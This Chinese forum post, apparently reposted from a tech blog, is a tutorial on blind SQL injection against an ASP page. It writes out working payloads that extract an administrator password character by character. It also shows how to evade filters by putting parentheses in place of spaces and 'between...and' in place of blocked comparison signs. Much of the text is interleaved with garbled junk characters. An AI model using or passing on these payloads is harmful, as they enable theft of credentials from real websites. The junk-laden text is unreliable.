| 我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:IXPUB技术博客%h ^#o p o9F [ IXPUB技术博客 |"Q/t-G J R2j (select asc(mid(pass,1,1)) from [name] where id=1)>49IXPUB技术博客 k g+y p;K.C _ 如何用空格呢?其实可以写成这样的: )c o H j w+S4G+H;[0 jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''=' (E%J ~&[3S2u0IXPUB技术博客;i9g3F9f M @ 如果屏蔽了<和>符号,则用between…and…,语句是: i | K3u a J)A I0 y a } e'i+W j&~0 jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''=' -r5d l W l f0 n/| O:U N @ s(K%|0对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,IXPUB技术博客6^ E.q1I5I C0G$] I 比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?IXPUB技术博客 g!g4[ `!I u&O L'[ G*H |
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
GMT+8, 2024-9-30 01:35 , Processed in 0.241147 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.
